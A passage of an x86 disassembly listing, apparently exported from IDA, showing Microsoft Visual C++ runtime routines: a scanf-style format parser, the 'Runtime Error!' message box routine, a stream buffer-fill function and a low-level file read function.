cmp eax, 9
jl short loc_4094E1
cmp eax, 0Dh
jle loc_409758
loc_4094E1: ; CODE XREF: .kSjx934:004094D6�j
cmp eax, 20h
jnz short loc_409517
loc_4094E6: ; CODE XREF: .kSjx934:004094D1�j
cmp ebx, 7Bh
jnz loc_409758
movsx ebx, byte ptr [ebp-18h]
xor edx, edx
mov ecx, eax
and ecx, 7
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, byte ptr [ebp+ecx+168h]
xor ecx, ebx
test edx, ecx
mov ebx, [ebp-20h]
jz loc_409758
loc_409517: ; CODE XREF: .kSjx934:004094CC�j
; .kSjx934:004094E4�j
cmp byte ptr [ebp-0Dh], 0
jnz loc_409752
cmp byte ptr [ebp-16h], 0
jz loc_409747
mov [ebp-50h], al
movzx eax, al
push eax
call sub_40CA36
test eax, eax
pop ecx
jz short loc_40954A
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4Fh], al
loc_40954A: ; CODE XREF: .kSjx934:0040953A�j
lea eax, [ebp-6Ch]
push eax
mov eax, [ebp-6Ch]
mov dword ptr [ebp-5Ch], 3Fh
push dword ptr [eax+0ACh]
lea eax, [ebp-50h]
push eax
lea eax, [ebp-5Ch]
push eax
call sub_40F3BD
mov ax, [ebp-5Ch]
add esp, 10h
mov [esi], ax
inc esi
inc esi
jmp loc_40974A
; ---------------------------------------------------------------------------
loc_40957C: ; CODE XREF: .kSjx934:00409173�j
mov eax, ebx
sub eax, 70h
jz loc_4097A3
sub eax, 3
jz loc_40947C
dec eax
dec eax
jz loc_4097A7
sub eax, 3
jz loc_4091C1
sub eax, 3
jz short loc_4095CA
loc_4095A6: ; CODE XREF: .kSjx934:00409193�j
; .kSjx934:004091A6�j
movzx eax, byte ptr [edi]
cmp eax, [ebp-4]
jnz loc_409A31
dec byte ptr [ebp-15h]
cmp byte ptr [ebp-0Dh], 0
jnz loc_4099C1
mov eax, [ebp-70h]
mov [ebp-58h], eax
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_4095CA: ; CODE XREF: .kSjx934:004095A4�j
cmp byte ptr [ebp-5], 0
jle short loc_4095D4
mov byte ptr [ebp-16h], 1
loc_4095D4: ; CODE XREF: .kSjx934:004095CE�j
inc edi
cmp byte ptr [edi], 5Eh
mov esi, edi
jnz short loc_4095E3
lea esi, [edi+1]
mov byte ptr [ebp-18h], 0FFh
loc_4095E3: ; CODE XREF: .kSjx934:004095DA�j
push 20h
lea eax, [ebp+168h]
push 0
push eax
call sub_407B70
add esp, 0Ch
cmp byte ptr [esi], 5Dh
jnz short loc_409607
mov dl, 5Dh
inc esi
mov byte ptr [ebp+173h], 20h
jmp short loc_409676
; ---------------------------------------------------------------------------
loc_409607: ; CODE XREF: .kSjx934:004095F9�j
mov dl, [ebp-3Dh]
jmp short loc_409676
; ---------------------------------------------------------------------------
loc_40960C: ; CODE XREF: .kSjx934:0040967A�j
inc esi
cmp al, 2Dh
jnz short loc_409659
test dl, dl
jz short loc_409659
mov cl, [esi]
cmp cl, 5Dh
jz short loc_409659
inc esi
cmp dl, cl
jnb short loc_409625
mov al, cl
jmp short loc_409629
; ---------------------------------------------------------------------------
loc_409625: ; CODE XREF: .kSjx934:0040961F�j
mov al, dl
mov dl, cl
loc_409629: ; CODE XREF: .kSjx934:00409623�j
cmp dl, al
ja short loc_409655
sub al, dl
inc al
movzx edi, dl
movzx edx, al
loc_409637: ; CODE XREF: .kSjx934:00409650�j
mov ecx, edi
and ecx, 7
mov eax, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+168h]
or [eax], bl
inc edi
dec edx
jnz short loc_409637
mov ebx, [ebp-20h]
loc_409655: ; CODE XREF: .kSjx934:0040962B�j
xor dl, dl
jmp short loc_409676
; ---------------------------------------------------------------------------
loc_409659: ; CODE XREF: .kSjx934:0040960F�j
; .kSjx934:00409613�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+168h]
or [eax], bl
mov ebx, [ebp-20h]
loc_409676: ; CODE XREF: .kSjx934:00409605�j
; .kSjx934:0040960A�j ...
mov al, [esi]
cmp al, 5Dh
jnz short loc_40960C
test al, al
jz loc_409A59
mov [ebp-28h], esi
mov esi, [ebp-38h]
jmp loc_409486
; ---------------------------------------------------------------------------
loc_40968F: ; CODE XREF: .kSjx934:004091C7�j
cmp ebx, 2Bh
jnz short loc_4096B3
loc_409694: ; CODE XREF: .kSjx934:004091D1�j
dec dword ptr [ebp-0Ch]
jnz short loc_4096A3
test ecx, ecx
jz short loc_4096A3
mov byte ptr [ebp+3], 1
jmp short loc_4096B3
; ---------------------------------------------------------------------------
loc_4096A3: ; CODE XREF: .kSjx934:00409697�j
; .kSjx934:0040969B�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
mov [ebp-4], ebx
loc_4096B3: ; CODE XREF: .kSjx934:00409692�j
; .kSjx934:004096A1�j
cmp ebx, 30h
jnz loc_4097D9
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
cmp bl, 78h
mov [ebp-4], ebx
jz short loc_409718
cmp bl, 58h
jz short loc_409718
cmp dword ptr [ebp-20h], 78h
mov dword ptr [ebp-1Ch], 1
jz short loc_4096FD
cmp dword ptr [ebp-2Ch], 0
jz short loc_4096F1
dec dword ptr [ebp-0Ch]
jnz short loc_4096F1
inc byte ptr [ebp+3]
loc_4096F1: ; CODE XREF: .kSjx934:004096E7�j
; .kSjx934:004096EC�j
mov dword ptr [ebp-20h], 6Fh
jmp loc_4097D9
; ---------------------------------------------------------------------------
loc_4096FD: ; CODE XREF: .kSjx934:004096E1�j
dec dword ptr [ebp+4]
cmp ebx, 0FFFFFFFFh
jz short loc_409710
push dword ptr [ebp-14h]
push ebx
call sub_40F29F
pop ecx
pop ecx
loc_409710: ; CODE XREF: .kSjx934:00409703�j
push 30h
pop ebx
jmp loc_4097D6
; ---------------------------------------------------------------------------
loc_409718: ; CODE XREF: .kSjx934:004096CF�j
; .kSjx934:004096D4�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
cmp dword ptr [ebp-2Ch], 0
mov ebx, eax
mov [ebp-4], ebx
jz short loc_40973B
sub dword ptr [ebp-0Ch], 2
cmp dword ptr [ebp-0Ch], 1
jge short loc_40973B
inc byte ptr [ebp+3]
loc_40973B: ; CODE XREF: .kSjx934:0040972C�j
; .kSjx934:00409736�j
mov dword ptr [ebp-20h], 78h
jmp loc_4097D9
; ---------------------------------------------------------------------------
loc_409747: ; CODE XREF: .kSjx934:00409525�j
mov [esi], al
inc esi
loc_40974A: ; CODE XREF: .kSjx934:00409577�j
mov [ebp-38h], esi
jmp loc_40949E
; ---------------------------------------------------------------------------
loc_409752: ; CODE XREF: .kSjx934:0040951B�j
inc edi
jmp loc_40949E
; ---------------------------------------------------------------------------
loc_409758: ; CODE XREF: .kSjx934:004094C3�j
; .kSjx934:004094DB�j ...
dec dword ptr [ebp+4]
cmp eax, 0FFFFFFFFh
jz short loc_40976B
push dword ptr [ebp-14h]
push eax
call sub_40F29F
pop ecx
pop ecx
loc_40976B: ; CODE XREF: .kSjx934:004094AC�j
; .kSjx934:0040975E�j
cmp edi, esi
jz loc_409A59
cmp byte ptr [ebp-0Dh], 0
jnz loc_4099C1
inc dword ptr [ebp-3Ch]
cmp ebx, 63h
jz loc_4099C1
cmp byte ptr [ebp-16h], 0
mov eax, [ebp-38h]
jz short loc_40979B
and word ptr [eax], 0
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_40979B: ; CODE XREF: .kSjx934:00409790�j
mov byte ptr [eax], 0
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_4097A3: ; CODE XREF: .kSjx934:00409581�j
mov byte ptr [ebp-0Eh], 1
loc_4097A7: ; CODE XREF: .kSjx934:00409179�j
; .kSjx934:0040918D�j ...
mov ebx, [ebp-4]
cmp ebx, 2Dh
jnz short loc_4097B5
mov byte ptr [ebp-17h], 1
jmp short loc_4097BA
; ---------------------------------------------------------------------------
loc_4097B5: ; CODE XREF: .kSjx934:004097AD�j
cmp ebx, 2Bh
jnz short loc_4097D9
loc_4097BA: ; CODE XREF: .kSjx934:004097B3�j
dec dword ptr [ebp-0Ch]
jnz short loc_4097C9
test ecx, ecx
jz short loc_4097C9
mov byte ptr [ebp+3], 1
jmp short loc_4097D9
; ---------------------------------------------------------------------------
loc_4097C9: ; CODE XREF: .kSjx934:004097BD�j
; .kSjx934:004097C1�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
loc_4097D6: ; CODE XREF: .kSjx934:00409713�j
mov [ebp-4], ebx
loc_4097D9: ; CODE XREF: .kSjx934:004096B6�j
; .kSjx934:004096F8�j ...
cmp dword ptr [ebp-48h], 0
jz loc_4098DE
cmp byte ptr [ebp+3], 0
jnz loc_4098B9
loc_4097ED: ; CODE XREF: .kSjx934:004098A1�j
cmp dword ptr [ebp-20h], 78h
jz short loc_409842
cmp dword ptr [ebp-20h], 70h
jz short loc_409842
movzx eax, bl
push eax
call sub_40F17F
test eax, eax
pop ecx
jz loc_4098A6
cmp dword ptr [ebp-20h], 6Fh
jnz short loc_40982C
cmp ebx, 38h
jge loc_4098A6
mov eax, [ebp-30h]
mov esi, [ebp-34h]
shld eax, esi, 3
shl esi, 3
mov [ebp-30h], eax
jmp short loc_409877
; ---------------------------------------------------------------------------
loc_40982C: ; CODE XREF: .kSjx934:0040980F�j
push 0
push 0Ah
push dword ptr [ebp-30h]
push dword ptr [ebp-34h]
call sub_40F4F0
mov esi, eax
mov [ebp-30h], edx
jmp short loc_409877
; ---------------------------------------------------------------------------
loc_409842: ; CODE XREF: .kSjx934:004097F1�j
; .kSjx934:004097F7�j
movzx edi, bl
push edi
call sub_40F1FC
test eax, eax
pop ecx
jz short loc_4098A6
mov eax, [ebp-30h]
mov esi, [ebp-34h]
shld eax, esi, 4
push edi
shl esi, 4
mov [ebp-30h], eax
call sub_40F17F
test eax, eax
pop ecx
movsx ebx, bl
jnz short loc_409874
and ebx, 0FFFFFFDFh
sub ebx, 7
loc_409874: ; CODE XREF: .kSjx934:0040986C�j
mov [ebp-4], ebx
loc_409877: ; CODE XREF: .kSjx934:0040982A�j
; .kSjx934:00409840�j
inc dword ptr [ebp-1Ch]
lea eax, [ebx-30h]
cdq
add esi, eax
adc [ebp-30h], edx
cmp dword ptr [ebp-2Ch], 0
mov [ebp-34h], esi
jz short loc_409891
dec dword ptr [ebp-0Ch]
jz short loc_4098B9
loc_409891: ; CODE XREF: .kSjx934:0040988A�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
mov [ebp-4], ebx
jmp loc_4097ED
; ---------------------------------------------------------------------------
loc_4098A6: ; CODE XREF: .kSjx934:00409805�j
; .kSjx934:00409814�j ...
dec dword ptr [ebp+4]
cmp ebx, 0FFFFFFFFh
jz short loc_4098B9
push dword ptr [ebp-14h]
push ebx
call sub_40F29F
pop ecx
pop ecx
loc_4098B9: ; CODE XREF: .kSjx934:004097E7�j
; .kSjx934:0040988F�j ...
cmp byte ptr [ebp-17h], 0
mov edi, [ebp-54h]
jz loc_409981
mov eax, [ebp-34h]
mov ecx, [ebp-30h]
neg eax
adc ecx, 0
neg ecx
mov [ebp-34h], eax
mov [ebp-30h], ecx
jmp loc_409981
; ---------------------------------------------------------------------------
loc_4098DE: ; CODE XREF: .kSjx934:004097DD�j
cmp byte ptr [ebp+3], 0
mov edi, [ebp-54h]
jnz loc_409979
loc_4098EB: ; CODE XREF: .kSjx934:00409964�j
cmp dword ptr [ebp-20h], 78h
jz short loc_40991A
cmp dword ptr [ebp-20h], 70h
jz short loc_40991A
movzx eax, bl
push eax
call sub_40F17F
test eax, eax
pop ecx
jz short loc_409966
cmp dword ptr [ebp-20h], 6Fh
jnz short loc_409915
cmp ebx, 38h
jge short loc_409966
shl edi, 3
jmp short loc_409942
; ---------------------------------------------------------------------------
loc_409915: ; CODE XREF: .kSjx934:00409909�j
imul edi, 0Ah
jmp short loc_409942
; ---------------------------------------------------------------------------
loc_40991A: ; CODE XREF: .kSjx934:004098EF�j
; .kSjx934:004098F5�j
movzx esi, bl
push esi
call sub_40F1FC
test eax, eax
pop ecx
jz short loc_409966
push esi
shl edi, 4
call sub_40F17F
test eax, eax
pop ecx
movsx ebx, bl
jnz short loc_40993F
and ebx, 0FFFFFFDFh
sub ebx, 7
loc_40993F: ; CODE XREF: .kSjx934:00409937�j
mov [ebp-4], ebx
loc_409942: ; CODE XREF: .kSjx934:00409913�j
; .kSjx934:00409918�j
inc dword ptr [ebp-1Ch]
cmp dword ptr [ebp-2Ch], 0
lea edi, [edi+ebx-30h]
jz short loc_409954
dec dword ptr [ebp-0Ch]
jz short loc_409979
loc_409954: ; CODE XREF: .kSjx934:0040994D�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
mov [ebp-4], ebx
jmp short loc_4098EB
; ---------------------------------------------------------------------------
loc_409966: ; CODE XREF: .kSjx934:00409903�j
; .kSjx934:0040990E�j ...
dec dword ptr [ebp+4]
cmp ebx, 0FFFFFFFFh
jz short loc_409979
push dword ptr [ebp-14h]
push ebx
call sub_40F29F
pop ecx
pop ecx
loc_409979: ; CODE XREF: .kSjx934:004098E5�j
; .kSjx934:00409952�j ...
cmp byte ptr [ebp-17h], 0
jz short loc_409981
neg edi
loc_409981: ; CODE XREF: .kSjx934:004098C0�j
; .kSjx934:004098D9�j ...
cmp dword ptr [ebp-20h], 46h
jnz short loc_40998B
and dword ptr [ebp-1Ch], 0
loc_40998B: ; CODE XREF: .kSjx934:00409985�j
cmp dword ptr [ebp-1Ch], 0
jz loc_409A59
cmp byte ptr [ebp-0Dh], 0
jnz short loc_4099C1
inc dword ptr [ebp-3Ch]
mov esi, [ebp-38h]
loc_4099A1: ; CODE XREF: .kSjx934:004091B3�j
cmp dword ptr [ebp-48h], 0
jz short loc_4099B4
mov eax, [ebp-34h]
mov [esi], eax
mov eax, [ebp-30h]
mov [esi+4], eax
jmp short loc_4099C1
; ---------------------------------------------------------------------------
loc_4099B4: ; CODE XREF: .kSjx934:004099A5�j
cmp byte ptr [ebp-0Eh], 0
jz short loc_4099BE
mov [esi], edi
jmp short loc_4099C1
; ---------------------------------------------------------------------------
loc_4099BE: ; CODE XREF: .kSjx934:004099B8�j
mov [esi], di
loc_4099C1: ; CODE XREF: .kSjx934:004091B9�j
; .kSjx934:0040943A�j ...
mov edi, [ebp-28h]
inc byte ptr [ebp-15h]
inc edi
mov [ebp-28h], edi
jmp short loc_409A0F
; ---------------------------------------------------------------------------
loc_4099CD: ; CODE XREF: .kSjx934:00408FE3�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
movzx eax, byte ptr [edi]
inc edi
cmp eax, ebx
mov [ebp-4], ebx
mov [ebp-28h], edi
jnz short loc_409A47
movzx eax, bl
push eax
call sub_40CA36
test eax, eax
pop ecx
jz short loc_409A0F
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
movzx ecx, byte ptr [edi]
inc edi
cmp ecx, eax
mov [ebp-28h], edi
jnz short loc_409A37
dec dword ptr [ebp+4]
loc_409A0F: ; CODE XREF: .kSjx934:004099CB�j
; .kSjx934:004099F4�j
cmp dword ptr [ebp-4], 0FFFFFFFFh
jnz short loc_409A25
cmp byte ptr [edi], 25h
jnz short loc_409A59
mov eax, [ebp-28h]
cmp byte ptr [eax+1], 6Eh
jnz short loc_409A59
mov edi, eax
loc_409A25: ; CODE XREF: .kSjx934:00408FDB�j
; .kSjx934:00409A13�j
mov al, [edi]
test al, al
jnz loc_408F9F
jmp short loc_409A59
; ---------------------------------------------------------------------------
loc_409A31: ; CODE XREF: .kSjx934:0040916A�j
; .kSjx934:004095AC�j
cmp dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_409A4A
; ---------------------------------------------------------------------------
loc_409A37: ; CODE XREF: .kSjx934:00409A0A�j
cmp eax, 0FFFFFFFFh
jz short loc_409A47
push dword ptr [ebp-14h]
push eax
call sub_40F29F
pop ecx
pop ecx
loc_409A47: ; CODE XREF: .kSjx934:004099E6�j
; .kSjx934:00409A3A�j
cmp ebx, 0FFFFFFFFh
loc_409A4A: ; CODE XREF: .kSjx934:00409A35�j
jz short loc_409A59
push dword ptr [ebp-14h]
push dword ptr [ebp-4]
call sub_40F29F
pop ecx
pop ecx
loc_409A59: ; CODE XREF: .kSjx934:00409153�j
; .kSjx934:0040923E�j ...
cmp dword ptr [ebp-44h], 1
jnz short loc_409A68
push dword ptr [ebp-24h]
call sub_403603
pop ecx
loc_409A68: ; CODE XREF: .kSjx934:00409A5D�j
cmp dword ptr [ebp-4], 0FFFFFFFFh
jnz short loc_409A8C
mov eax, [ebp-3Ch]
test eax, eax
jnz short loc_409A7D
cmp [ebp-15h], al
jnz short loc_409A7D
or eax, 0FFFFFFFFh
loc_409A7D: ; CODE XREF: .kSjx934:00409A73�j
; .kSjx934:00409A78�j
cmp byte ptr [ebp-60h], 0
jz short loc_409A9C
mov ecx, [ebp-64h]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_409A9C
; ---------------------------------------------------------------------------
loc_409A8C: ; CODE XREF: .kSjx934:00408F96�j
; .kSjx934:00409A6C�j
cmp byte ptr [ebp-60h], 0
jz short loc_409A99
mov eax, [ebp-64h]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_409A99: ; CODE XREF: .kSjx934:00409A90�j
mov eax, [ebp-3Ch]
loc_409A9C: ; CODE XREF: .kSjx934:00408ED7�j
; .kSjx934:00409A81�j ...
mov ecx, [ebp+188h]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 18Ch
leave
retn
; =============== S U B R O U T I N E =======================================
sub_409AB4 proc near ; CODE XREF: sub_4036E0+2A�p
; sub_403ED3+12�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
mov ebx, [esp+8+arg_0]
push esi
push edi
xor esi, esi
xor edi, edi
loc_409AC0: ; CODE XREF: sub_409AB4+19�j
cmp ebx, ds:dword_423C00[edi*8]
jz short loc_409ACF
inc edi
cmp edi, 17h
jl short loc_409AC0
loc_409ACF: ; CODE XREF: sub_409AB4+13�j
cmp edi, 17h
jnb loc_409C4F
push ebp
push 3
call sub_40F6C2
cmp eax, 1
pop ecx
jz loc_409C1B
push 3
call sub_40F6C2
test eax, eax
pop ecx
jnz short loc_409B03
cmp ds:dword_423050, 1
jz loc_409C1B
loc_409B03: ; CODE XREF: sub_409AB4+40�j
cmp ebx, 0FCh
jz loc_409C4E
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
mov ebx, 314h
push ebx
mov ebp, offset dword_425FD8
push ebp
call sub_4076D5
add esp, 0Ch
test eax, eax
jz short loc_409B39
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_409B39: ; CODE XREF: sub_409AB4+76�j
push 104h
mov esi, offset byte_425FF1
push esi
push 0
mov ds:byte_4260F5, 0
call ds:dword_41D060
test eax, eax
jnz short loc_409B7D
push offset aProgramNameUnk ; "<program name unknown>"
push 2FBh
push esi
call sub_4076D5
add esp, 0Ch
test eax, eax
jz short loc_409B7D
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402E3D
add esp, 14h
loc_409B7D: ; CODE XREF: sub_409AB4+A1�j
; sub_409AB4+B8�j
push esi
call sub_404130
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_409BC2
push esi
call sub_404130
sub esi, 3Bh
add eax, esi
push 3
mov ecx, offset dword_4262EC
push offset a___ ; "..."
sub ecx, eax
push ecx
push eax
call sub_40C846
add esp, 14h
test eax, eax
jz short loc_409BC2
xor esi, esi
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
jmp short loc_409BC4
; ---------------------------------------------------------------------------
loc_409BC2: ; CODE XREF: sub_409AB4+D4�j
; sub_409AB4+FB�j
xor esi, esi
loc_409BC4: ; CODE XREF: sub_409AB4+10C�j
push offset asc_41DB10 ; "\n\n"
push ebx
push ebp
call sub_40C78D
add esp, 0Ch
test eax, eax
jz short loc_409BE4
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_409BE4: ; CODE XREF: sub_409AB4+121�j
push ds:off_423C04[edi*8]
push ebx
push ebp
call sub_40C78D
add esp, 0Ch
test eax, eax
jz short loc_409C06
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_409C06: ; CODE XREF: sub_409AB4+143�j
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebp
call sub_40F524
add esp, 0Ch
jmp short loc_409C4E
; ---------------------------------------------------------------------------
loc_409C1B: ; CODE XREF: sub_409AB4+30�j
; sub_409AB4+49�j
push 0FFFFFFF4h
call ds:dword_41D14C
mov ebp, eax
cmp ebp, esi
jz short loc_409C4E
cmp ebp, 0FFFFFFFFh
jz short loc_409C4E
push 0
lea eax, [esp+18h+var_4]
push eax
lea esi, ds:423C04h[edi*8]
push dword ptr [esi]
call sub_404130
pop ecx
push eax
push dword ptr [esi]
push ebp
call ds:dword_41D088
loc_409C4E: ; CODE XREF: sub_409AB4+55�j
; sub_409AB4+165�j ...
pop ebp
loc_409C4F: ; CODE XREF: sub_409AB4+1E�j
pop edi
pop esi
pop ebx
pop ecx
retn
sub_409AB4 endp
; =============== S U B R O U T I N E =======================================
sub_409C54 proc near ; CODE XREF: sub_4036E0+23�p
; sub_403ED3+9�p ...
push 3
call sub_40F6C2
cmp eax, 1
pop ecx
jz short loc_409C76
push 3
call sub_40F6C2
test eax, eax
pop ecx
jnz short locret_409C8C
cmp ds:dword_423050, 1
jnz short locret_409C8C
loc_409C76: ; CODE XREF: sub_409C54+B�j
push 0FCh
call sub_409AB4
push 0FFh
call sub_409AB4
pop ecx
pop ecx
locret_409C8C: ; CODE XREF: sub_409C54+17�j
; sub_409C54+20�j
retn
sub_409C54 endp
; =============== S U B R O U T I N E =======================================
sub_409C8D proc near ; CODE XREF: sub_403B22+ED�p
; sub_408E2C+F�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
cmp esi, edi
jnz short loc_409CB6
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
jmp loc_409DA7
; ---------------------------------------------------------------------------
loc_409CB6: ; CODE XREF: sub_409C8D+A�j
mov eax, [esi+0Ch]
test al, 83h
jz loc_409DA7
test al, 40h
jnz loc_409DA7
test al, 2
jz short loc_409CD8
or eax, 20h
mov [esi+0Ch], eax
jmp loc_409DA7
; ---------------------------------------------------------------------------
loc_409CD8: ; CODE XREF: sub_409C8D+3E�j
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_409CED
push esi
call sub_40D4FC
pop ecx
jmp short loc_409CF2
; ---------------------------------------------------------------------------
loc_409CED: ; CODE XREF: sub_409C8D+55�j
mov eax, [esi+8]
mov [esi], eax
loc_409CF2: ; CODE XREF: sub_409C8D+5E�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push esi
call sub_408A20
pop ecx
push eax
call sub_40A34F
add esp, 0Ch
cmp eax, edi
mov [esi+4], eax
jz loc_409D97
cmp eax, 0FFFFFFFFh
jz short loc_409D97
test byte ptr [esi+0Ch], 82h
jnz short loc_409D6D
push esi
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_409D58
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_409D58
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_409D5D
; ---------------------------------------------------------------------------
loc_409D58: ; CODE XREF: sub_409C8D+9B�j
; sub_409C8D+A7�j
mov eax, offset dword_423BD0
loc_409D5D: ; CODE XREF: sub_409C8D+C9�j
mov al, [eax+4]
and al, 82h
cmp al, 82h
jnz short loc_409D6D
or dword ptr [esi+0Ch], 2000h
loc_409D6D: ; CODE XREF: sub_409C8D+8F�j
; sub_409C8D+D7�j
cmp dword ptr [esi+18h], 200h
jnz short loc_409D8A
mov eax, [esi+0Ch]
test al, 8
jz short loc_409D8A
test ax, 400h
jnz short loc_409D8A
mov dword ptr [esi+18h], 1000h
loc_409D8A: ; CODE XREF: sub_409C8D+E7�j
; sub_409C8D+EE�j ...
mov ecx, [esi]
dec dword ptr [esi+4]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_409DAA
; ---------------------------------------------------------------------------
loc_409D97: ; CODE XREF: sub_409C8D+80�j
; sub_409C8D+89�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
mov [esi+4], edi
loc_409DA7: ; CODE XREF: sub_409C8D+24�j
; sub_409C8D+2E�j ...
or eax, 0FFFFFFFFh
loc_409DAA: ; CODE XREF: sub_409C8D+108�j
pop edi
pop esi
retn
sub_409C8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DAD proc near ; CODE XREF: sub_40A34F+9A�p
; sub_40E072+355�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov edx, [ebp+arg_8]
push esi
mov esi, [ebp+arg_0]
push 0FFFFFFFEh
pop eax
cmp esi, eax
mov [ebp+var_14], eax
mov [ebp+var_1C], edx
jnz short loc_409DE2
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
jmp loc_40A34C
; ---------------------------------------------------------------------------
loc_409DE2: ; CODE XREF: sub_409DAD+18�j
push edi
xor edi, edi
cmp esi, edi
jl short loc_409DF1
cmp esi, ds:dword_433C84
jb short loc_409E18
loc_409DF1: ; CODE XREF: sub_409DAD+3A�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 9
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_40A34B
; ---------------------------------------------------------------------------
loc_409E18: ; CODE XREF: sub_409DAD+42�j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
push ebx
lea ebx, ds:433CA0h[eax*4]
mov eax, [ebx]
add eax, esi
mov cl, [eax+4]
test cl, 1
jnz short loc_409E4E
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
jmp loc_409F95
; ---------------------------------------------------------------------------
loc_409E4E: ; CODE XREF: sub_409DAD+88�j
cmp edx, edi
mov [ebp+var_10], edi
jz loc_40A348
test cl, 2
jnz loc_40A348
mov ecx, [ebp+arg_4]
cmp ecx, edi
jz loc_409F83
mov al, [eax+24h]
add al, al
sar al, 1
mov [ebp+var_2], al
movsx eax, al
dec eax
jz loc_409F7B
dec eax
jnz short loc_409E96
mov eax, edx
not eax
test al, 1
jz loc_409F83
and edx, 0FFFFFFFEh
mov [ebp+arg_8], edx
loc_409E96: ; CODE XREF: sub_409DAD+D5�j
mov [ebp+var_C], ecx
loc_409E99: ; CODE XREF: sub_409DAD+216�j
mov ecx, [ebx]
mov eax, [ebp+var_C]
lea edi, [esi+ecx]
test byte ptr [edi+4], 48h
jz short loc_409F1D
mov cl, [edi+5]
cmp cl, 0Ah
jz short loc_409F1D
xor edx, edx
cmp [ebp+arg_8], edx
jz short loc_409F1D
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
cmp [ebp+var_2], dl
mov [ebp+var_10], 1
mov byte ptr [esi+ecx+5], 0Ah
jz short loc_409F1D
mov ecx, [ebx]
mov cl, [esi+ecx+25h]
cmp cl, 0Ah
jz short loc_409F1D
cmp [ebp+arg_8], edx
jz short loc_409F1D
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
cmp [ebp+var_2], 1
mov [ebp+var_10], 2
mov byte ptr [esi+ecx+25h], 0Ah
jnz short loc_409F1D
mov ecx, [ebx]
mov cl, [esi+ecx+26h]
cmp cl, 0Ah
jz short loc_409F1D
cmp [ebp+arg_8], edx
jz short loc_409F1D
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
mov [ebp+var_10], 3
mov byte ptr [esi+ecx+26h], 0Ah
loc_409F1D: ; CODE XREF: sub_409DAD+F8�j
; sub_409DAD+100�j ...
push 0
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_8]
push eax
mov eax, [ebx]
push dword ptr [esi+eax]
call ds:dword_41D078
test eax, eax
jz loc_40A312
mov edi, [ebp+var_18]
test edi, edi
jl loc_40A312
cmp edi, [ebp+arg_8]
ja loc_40A312
mov eax, [ebx]
add [ebp+var_10], edi
lea eax, [esi+eax+4]
test byte ptr [eax], 80h
jz loc_40A1B2
cmp [ebp+var_2], 2
jz loc_40A1DC
test edi, edi
jz short loc_409FE7
mov ecx, [ebp+var_C]
cmp byte ptr [ecx], 0Ah
jnz short loc_409FE7
or byte ptr [eax], 4
jmp short loc_409FEA
; ---------------------------------------------------------------------------
loc_409F7B: ; CODE XREF: sub_409DAD+CE�j
mov eax, edx
